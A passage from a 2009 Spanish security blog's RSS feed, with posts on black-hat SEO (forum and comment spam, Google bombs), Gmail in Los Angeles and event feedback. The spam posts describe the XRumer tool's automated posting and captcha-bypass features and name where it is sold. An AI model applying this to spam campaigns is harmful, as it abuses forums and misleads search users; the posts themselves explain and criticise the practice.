existente, por lo que se abusa para introducir links a la página que se desea posicionar mejor.&lt;br /&gt;&lt;br /&gt;En este ejemplo concreto, en un foro del Ministerio de Educación y Ciencia se llegaron a postear infinidad de comentarios que hiceron que del mismo tema se alcanzará el friolero número de más de 200 páginas.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SutjdlYZcmI/AAAAAAAAFbE/n59wPBFiA8E/s1600-h/Figura6.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 286px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SutjdlYZcmI/AAAAAAAAFbE/n59wPBFiA8E/s400/Figura6.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398517938235470434" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 6: Más de 200 páginas en un tema de debate sobre "La sombra del viento". El libro es bueno, pero...&lt;/em&gt;&lt;/center&gt; &lt;br /&gt;Afortunadamente, hoy por hoy este tema en el foro está cerrado y se ha limpiado de todo lo que llegó a aparecer por allí. Por el contrario, los spammers han seguido acribillando otros &lt;a href="http://foros.cnice.mec.es/forum/lectura3/topic.cgi?forum=1&amp;topic=5&amp;start=490"&gt;temas de debate dentro del mismo foro&lt;/a&gt;, llegando hasta más de 350 páginas.&lt;br /&gt;&lt;br /&gt;En otras ocasiones se abusa en las opciones de configuración relajadas de los comentarios en los blogs. &lt;a href="http://elladodelmal.blogspot.com"&gt;El lado del mal&lt;/a&gt; ha sido atacado varias veces con comentarios del tipo que puedes ver aquí.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SutjdctBYXI/AAAAAAAAFa8/6k4L8cHsISE/s1600-h/Figura7.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 366px; height: 400px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SutjdctBYXI/AAAAAAAAFa8/6k4L8cHsISE/s400/Figura7.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398517935906054514" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 7: Comentario de spam en "Un informático en el lado del mal"&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;El error grande fue no eliminar ese primer comentario metido de spam, con lo que el blog fue atacado dos veces con más de 200 comentarios del estilo de este, aprovechándose de la configuración relajada de comentarios de este blog, que permite usuarios anónimos y de que el comentario inicial no había sido borrado.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Automatización de spam&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Para realizar este posteo de temas y comentarios de forma automática existen muchas herramientas. Quizá una de las más populares para realizar este ataque sea &lt;strong&gt;&lt;em&gt;XRumer&lt;/em&gt;&lt;/strong&gt; de &lt;em&gt;Alexandr M. Ryabchenko&lt;/em&gt;. Esta herramienta está diseñada y pensada expresamente para esta tarea.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SutjdA2sjeI/AAAAAAAAFa0/tzE5hxwyBh0/s1600-h/Figura8.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 227px;" src="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/SutjdA2sjeI/AAAAAAAAFa0/tzE5hxwyBh0/s400/Figura8.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398517928430439906" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 8: XRumer 5&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Soporta ataques automatizados a phpBB, YaBB, vBulletin, Invision Power Board, etc… La herramienta permite crear cuentas de forma automatizada si es posible, postear nuevos temas de debate, responder a temas existentes, o incluso crear sus propios debates, contestándose a sí mismo. Todo esto, con soporte multithread, por supuesto, y generación de mensajes automáticos, uso de proxy y comprobación del anónimato del mismo más un testeo posterior para saber que ha tenido éxito en cada intento.&lt;br /&gt;&lt;br /&gt;Existe un &lt;a href="http://www.botmasternet.com/movies/XFull.htm"&gt;tutorial de la versión 3&lt;/a&gt;, no de la última versión, y la herramienta, en versión 5, está disponible a la venta en la URL &lt;em&gt;http://www.botmasternet.com&lt;/em&gt;, pero permitidme que no le enlace desde este post.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Captchas&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Como es de suponer, la única defensa posible, aparte de una política férrea de permisos sobre los usuarios que pueden postear o no, es la protección por captchas. No obstante, el uso de &lt;a href="http://www.slideshare.net/aramosf/crapcha-sv10-slide-share"&gt;captchas débiles&lt;/a&gt; tampoco es solución contra este tipo de herramientas pues estas herramientas también vienen preparadas contra este tipo de protecciones. La siguiente imagen muestra la lista de captchas que es capaz de saltarse esta herramienta.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/Sutjc2guq7I/AAAAAAAAFas/9PcalKfipaU/s1600-h/Figura9.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 178px; height: 400px;" src="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/Sutjc2guq7I/AAAAAAAAFas/9PcalKfipaU/s400/Figura9.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398517925653949362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 9: Captchas soportados por XRumer&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;No es de extrañar que se armara tanto revuelo cuando &lt;strong&gt;&lt;em&gt;Rubén Santamarta&lt;/em&gt;&lt;/strong&gt; publico &lt;a href="http://blog.wintercore.com/?p=11"&gt;una forma para saltarse el captcha de Google utilizando el sistema de accesibilidad auditiva&lt;/a&gt;, ya que esto podría suponer un incremento masivo del volumen de spam a través de los sistemas de Google.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;AntiSpam&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Como medida adicional a los captchas, muchos sistemas de publicación que permiten comentarios de usuario están aplicando tecnologías AntiSpam como política de aprobación o no de un comentario. Estas políticas son similares a las utilizadas en el correo electrónico. Su objetivo es analizar la topología del comentario y descubrir si es un mensaje de spam o no mediante un índice similar al SCL (Spam Confidence Level).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-7908311722104141990?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/w61eJEoc1XQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/w61eJEoc1XQ/tecnicas-seo-para-gente-de-moral.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_Y2uWeGSk9Sw/SutkKZaE7oI/AAAAAAAAFbU/RCLv4Ogh56Y/s72-c/Figura4.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-176200322276198284</guid><pubDate>Fri, 30 Oct 2009 09:12:00 +0000</pubDate><atom:updated>2009-10-30T14:32:48.594+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">Exchange Server</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Gmail</category><title>Medidas Anti-crisis en LA</title><description>&lt;div align="justify"&gt;Supongo que a esta hora del día ya todos os habréis enterado de que el ayuntamiento de L.A. (siempre quise ir allí, dejar un día esta ciudad) &lt;a href="http://latimesblogs.latimes.com/technology/2009/10/city-council-votes-to-adopt-google-email-system-for-30000-city-employees.html"&gt;ha decidido contratar Gmail como correo para los 30.000 empleados de la ciudad&lt;/a&gt;.&lt;br /&gt;¿Cómo? ¿Estamos locos? ¿Es good enough? &lt;br /&gt;&lt;br /&gt;Sé que Gmail tiene muchos fans, y que para gran parte de ellos es el culmen de la evolución de la ciencia [Gracias Einstein, gracias Galileo, pero ya hemos llegado al final del camino… ah, no, que viene Wave] pero la realidad es que no tiene nada que ver con un sistema de comunicaciones corporativo como es Exchange "Conan" Server.&lt;br /&gt;&lt;br /&gt;Lo cierto es que no pretende ser este post ningún artículo de competencia entre Gmail y Exchange "Poli de Guardería" Server, ya que en primer lugar sería una pelea baladí y torticera pues Gmail habría que comprarlo con Live y no con algo infinitamente superior como Exchange “Terminator” Server 2003, 2007 o 2010 (cualquiera de ellos).&lt;br /&gt;&lt;br /&gt;Lo que más me ha llamado la atención de esta noticia ha sido el dónde y el cuándo.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Dónde:&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;En Los Ángeles, capital central de los negocios de California, estado dónde Google paga la mayor parte de los impuestos de beneficios que obtiene a nivel mundial. Luego hay algo claro, lo que es bueno para Google es bueno para California. Este concepto que tal vez suene extraño se puede ver en nuestro país con las ubicaciones de las fábricas de coches. Si una región tiene una fábrica de Citröen, entonces la mayoría de los coches que se venden allí son Citröen y todos te recomiendan Citröen. Lo mismo con la marca que elijáis. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Cuando:&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Pues en plena crisis económica, cuando más se necesita recaudar por parte de las administraciones públicas y haciendo un anuncio justo el día del aniversario de Internet. Joder, estos tipos son unos reyes del marketing. Si mucha gente decide seguir el ejemplo de LA (simpre quise ir allí, ¿lo he dicho?) con lo que recaude de impuestos a Google puede hacer que le salga gratis y encima gane pasta California. Eso es un plan ROI bien montado.&lt;br /&gt;&lt;br /&gt;La verdad es que me ha parecido un movimiento estratégico muy bien jugado por los políticos de California y por la propia Google digno de que le den un premio de marketing, porque seguro que muchos siguen el ejemplo de irse a Google porque ya lo hizo &lt;em&gt;“el ayuntamiento de L.A”&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Por último, es importante recordar, que para conseguir este acuerdo Google ha tenido que cambiar, de forma especial para ellos, las políticas de seguridad y privacidad, pues, como ya se sabe desde hace mucho tiempo, no son las más adecuadas para aplicar alguna legislación como la LOPD o la LSSI de nuestro país. Y a los usuarios, habrá que enseñarle que correos que no entran en Exchange ni en broma, &lt;a href="http://elladodelmal.blogspot.com/2009/07/gmail-y-el-antiphsing.html"&gt;se los van a comer en Gmail&lt;/a&gt;.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SuqvKSki86I/AAAAAAAAFak/asfFl6y6hn0/s1600-h/conan.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 259px; height: 356px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SuqvKSki86I/AAAAAAAAFak/asfFl6y6hn0/s400/conan.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398319694675637154" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Mandadle una invitación de Wave a Conan, que ya tiene el Gtalk&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Saludos Malignos!&lt;br /&gt;&lt;br /&gt;UPDATED: No me podía resistir a poner la canción, que yo también fui joven&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/GDyKmghr1Vc&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/GDyKmghr1Vc&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/center&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-176200322276198284?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/aCYjhi99WGI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/aCYjhi99WGI/medidas-anti-crisis-en-la.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SuqvKSki86I/AAAAAAAAFak/asfFl6y6hn0/s72-c/conan.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">18</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/medidas-anti-crisis-en-la.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-1004557539727581085</guid><pubDate>Wed, 28 Oct 2009 23:01:00 +0000</pubDate><atom:updated>2009-10-29T07:49:31.438+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Curiosidades</category><category domain="http://www.blogger.com/atom/ns#">Eventos</category><title>Telemetría</title><description>&lt;div align="justify"&gt;Con los años no me han quedado más narices que aprender algo sobre la organización y gestión de eventos. Esto le pasaría a cualquiera que llevara más de 8 años participando en eventos y habiendo pasado por más de 500 conferencias/charlas/cursos/seminarios/reuniones de bar.&lt;br /&gt;&lt;br /&gt;A lo largo de los años he interiorizado detalles de comportamiento en ponentes y pautas a evitar, aprender o repetir. Formulas que generan estrés en un asistente, aburrimiento, desasosiego o alegría. Muchas de ellas no sé explicarlas, otras sí, y se las transmito a los compañero cuando creo que pueden aportarles algo, que lo van a agradecer o que es necesario para que mejoren la experiencia de la ponencia por parte de los usuarios.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;“Si hablas muy rápido generas estrés, si dices veinte veces que no te da tiempo la gente piensa que realmente está mal diseñado y si una demo te falla y pides perdón 100 veces entonces los asistentes piensan que esa demo era LA DEMO y ellos, pobres, no han podido verla”.&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Conversaciones como estas se tienen después o antes de una charla entre los distintos ponentes. Yo me fijo en los trucos de los demás para ganar atención, mejorar la claridad del mensaje o conseguir una mejor comprensión por parte de los asistentes.&lt;br /&gt;&lt;br /&gt;Sin embargo, nada de eso valdría sin la telemetría. Si yo creo que algo no ha gustado no es realmente que no ha gustado hasta que no se comprueba. Y viceversa. Hay mucha gente que sale tan contenta de su charla y luego la telemetría dice otra cosa.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;¿La telemetría?&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Sí, la telemetría. &lt;strong&gt;&lt;em&gt;Gonzalo Alvarez Marañón&lt;/em&gt;&lt;/strong&gt; dice que &lt;a href="http://elartedepresentar.com/2009/08/24/si-puedes-medirlo-puedes-mejorarlo-la-importancia-del-post-evento/"&gt;si algo no puedes medirlo no puedes mejorarlo&lt;/a&gt;. Es necesario contar con un equipo de telemetría. Y ese truco me lo sé yo desde hace mucho tiempo, que ya sabéis que más sabe el maligno por viejo que por maligno.&lt;br /&gt;&lt;br /&gt;Desde hace mucho tiempo descubrí, gracias al gigante del mal, a la corporación Spectra, que todo es mejorable. ¡Dios!, ¡que revelación cuando oí eso la primera vez! Os lo voy a repetir: &lt;em&gt;“Todo es mejorable”&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;La primera vez que lo escuché, justo tras una campaña, me sorprendió, porque yo pensé que se refería a que se iba a obtener un resultado malo en los cuestionarios de calidad y no era así. Los cuestionarios de calidad reflejaban unas calificaciones impresionantes.&lt;br /&gt;&lt;br /&gt;La respuesta que me dio me enseñó que, efectivamente, ellos esperaban los mejores cuestionarios, porque no esperan que un asistente ponga un 3 en un cuestionario porque no le han dado 1.000.000 de dólares como regalo, o que uno ponga un 7 porque el regalo no le gustaba. La realidad es que se espera de un asistente que valore, con sinceridad, lo que se le ha ofrecido y no sueños o deseos. Lo que sí que es cierto, es que todo, siempre, puede hacerse un poco mejor y que, muchas veces, sin necesidad de gastar más dinero. Los comentarios que los asistentes ofrecen libremente con ideas, sugerencias o detección de defectos, ayudan a mejorar. &lt;br /&gt;&lt;br /&gt;Ese día aprendí a amar los cuestionarios y a que había que generar siempre telemetría.&lt;br /&gt;&lt;br /&gt;Desde hace tiempo, todos los eventos en los que me veo involucrados contrato a &lt;a href="http://www.eventos-creativos.com/"&gt;una empresa la telemetría de eventos&lt;/a&gt;. Una telemetría que utilizo para mejorar una charla, para cambiar un ejemplo, modificar la forma en la que cuento una historio o quitar algo que he dicho.&lt;br /&gt;&lt;br /&gt;Tras años de ver charlas, y sus telemetrías, soy capaz de, mirando al público y viendo la ponencia, acercarme a los resultados de valoración que va a obtener en los cuestionarios. Esto me llevó a decir, &lt;a href="http://elladodelmal.blogspot.com/2009/10/xss-ejemplar-con-gmail-y-firefox.html"&gt;en un post reciente&lt;/a&gt;, que las charlas de Ángel y Dab en las II jornadas de Seguridad de la Universidad de A Coruña habían sido mejores que la mía. En la telemetría quedé el tercero.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9gkCjEAI/AAAAAAAAFaM/OL9g18JyltE/s1600-h/Corunya.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 192px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9gkCjEAI/AAAAAAAAFaM/OL9g18JyltE/s400/Corunya.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397772520531365890" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 1: Telemetría II Jornadas Universidad A Coruña&lt;/em&gt;&lt;/Center&gt;&lt;br /&gt;Desde hace tiempo tengo un pique con Carles Martin por las valoraciones de las charlas. Y es que el tipo habla de cojones, el muy capullo. Así, en los resultados finales de la telemetría siempre andamos como en la fórmula 1, en las décimas o centésimas.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9hHxmA7I/AAAAAAAAFac/3AAlG3WBJHA/s1600-h/i64SOS.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 226px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9hHxmA7I/AAAAAAAAFac/3AAlG3WBJHA/s400/i64SOS.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397772530123932594" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 2: Resultados Gira Summer Of Security 2009 - Chema Alonso&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9g6lToEI/AAAAAAAAFaU/u0zAInU3f1Q/s1600-h/QuestSOS.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 242px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9g6lToEI/AAAAAAAAFaU/u0zAInU3f1Q/s400/QuestSOS.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397772526582734914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 3: Resultados Gira Summer of Security 2009 - Carles&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;&lt;em&gt;(Vale, es cierto, he aprovechado y he puesto unos resultados donde yo gané a Carles, pero él me dio para al pelo en el AD Movies, así que... ¡que lo ponga él en otro sitio que este es mi blog! :P)&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Sumar la telemetría de las charlas, los materiales, la sala, la organización, etc… da una buena imagen de si realmente los asistentes han disfrutado o no el evento. Para mi es fundamental.&lt;br /&gt;&lt;br /&gt;No sé para vosotros, pero estos piques sanos con los ponentes me encantan aunque salga perdiendo en algunas batallas, como en el SIMO, donde mis compis de I64 me dieron para el pelo en &lt;a href="http://blogs.technet.com/blog_innovacion/archive/2009/09/25/hands-on-lab-en-simo-networks.aspx"&gt;los Hands On Lab del SIMO&lt;/a&gt;.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9gbu4scI/AAAAAAAAFaE/Pp26HKu2QxE/s1600-h/SIMO.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 297px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9gbu4scI/AAAAAAAAFaE/Pp26HKu2QxE/s400/SIMO.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5397772518301413826" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 4: Telemetría HOLS Guiados SIMO 2009&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-1004557539727581085?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/uShIexxDzlg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/uShIexxDzlg/telemetria.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/Sui9gkCjEAI/AAAAAAAAFaM/OL9g18JyltE/s72-c/Corunya.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">11</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/10/telemetria.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-4823192869493077370</guid><pubDate>Tue, 27 Oct 2009 23:01:00 +0000</pubDate><atom:updated>2009-11-09T22:14:33.526+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">SEO</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Técnicas SEO para gente de moral relajada [I de VI]</title><description>&lt;div align="justify"&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Justificación&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Hay algo en lo que los distintos estudios sobre el uso de buscadores de Internet coinciden: casi todos los usuarios hacen clic en algunos de los enlaces de la primera página de resultados. Muchos lo hacen en los de la segunda. Hay quien, incluso, visita algunas de las direcciones listadas en la tercera, pero casi nadie pasa de ahí. Aparecer en la quinta página de resultados es casi lo mismo que no aparecer. Y, para una empresa u organización, eso puede significar no tener relevancia en el sector, no hacer negocio, carecer de publicidad… En definitiva, no existir.&lt;br /&gt;&lt;br /&gt;No es de extrañar que existan empresas que se dedican al posicionamiento en buscadores, es decir, a conseguir subir la relevancia de una página dada dentro de los resultados asociados a una determinada búsqueda. Pero no todas ellas realizan su trabajo de forma honesta: existe una nueva clase de empresarios de &lt;em&gt;“moral relajada”&lt;/em&gt; que utilizan sus propias técnicas, no siempre legales, para obtener sus beneficios.&lt;br /&gt;&lt;br /&gt;El presente artículo no es un artículo sobre SEO, sino de algunas técnicas y trucos, menos legales que más, que algunos usan para conseguir aparecer en las primeras posiciones de los resultados a una determinada búsqueda sin pagar el coste de los enlaces patrocinados.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Breve resumen de la historia del SEO para dummies&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Inicialmente, la relevancia de una página respecto a una cadena de búsqueda, se debía, única y exclusivamente, al contenido de la página. Para ello, los procesos de indexación y análisis de contenidos de una página realizaban un &lt;a href="http://en.wikipedia.org/wiki/Thesaurus"&gt;thesaurus&lt;/a&gt; de la misma. Es decir, leían todas las palabras, se quitaban todas las palabras ruido como artículos, preposiciones, conjunciones, etc…, después de contaban las repeticiones de la misma palabra, se medía su importancia respecto del tamaño total de la página, se miraban sinónimos de la misma palabra e incluso se buscaban las palabras especiales, es decir, las que eran menos comunes para darles mayor importancia. Otro de los aspectos que se evalúa dentro de una página web es, lógicamente, la ubicación del término dentro de la misma. No es igual que la palabra esté en el título que en una etiqueta meta, dentro del comentario de un visitante, en el texto de un botón o en que forme parte de un párrafo de texto. La ubicación cuenta.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;&lt;strong&gt;Spamdexing&lt;/strong&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Pero hacia la segunda mitad de los 90 este esquema dejó de ser válido. Hasta ese momento muchas webs eran diseñadas específicamente para atraer la atención de los buscadores, normalmente incluyendo numerosos tags META, con palabras en muchos casos no tenían relación con los contenidos de las páginas. A esta práctica se le conoció como “&lt;a href="http://en.wikipedia.org/wiki/Spamdexing"&gt;spamdexing&lt;/a&gt;”.&lt;br /&gt;&lt;br /&gt;La respuesta de los buscadores fue basar el orden de sus resultados en criterios más objetivos que los contenidos de la página. Y en el nuevo modelo los enlaces jugaron un papel fundamental.&lt;br /&gt;&lt;br /&gt;Así, el número de enlaces entrantes y salientes definen la importancia de una página, su &lt;em&gt;“peso”&lt;/em&gt; en Internet. Supongamos que una página tiene 20 links que apuntan a ella y ella apunta a 3. Cada uno de las 20 páginas que le apuntan tendrá su propia relevancia y, en función de ésta, le aportarán parte de su importancia en cada enlace. Del mismo modo, cada uno de los tres enlaces presentes en esta página proporcionará relevancia a las páginas destino.&lt;br /&gt;&lt;br /&gt;Dicha relevancia se utiliza para modificar el valor de una palabra en una búsqueda. Así, cuando se hace una  búsqueda de un término, se mira, tanto el contenido de la web, como el contenido de los links que apuntan a esa página y la relevancia de las páginas web de las que proceden los links.&lt;br /&gt;&lt;br /&gt;La relevancia se mide por página y no por dominio como muchos hemos creido alguna vez, así que la importancia de la ubicación de un link dentro de un dominio también importa. No es lo mismo la página principal de un sitio que puede tener un valor alto, como un link puesto en una página interior que tenga una valor bajo. Los valores de una página se pueden consultar en muchos lugares. Hay un buscador en &lt;a href="http://www.seochat.com/seo-tools/pagerank-lookup/"&gt;SEOchat&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Bombas Google&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Conociendo este comportamiento era posible conseguir que en los primeros resultados de 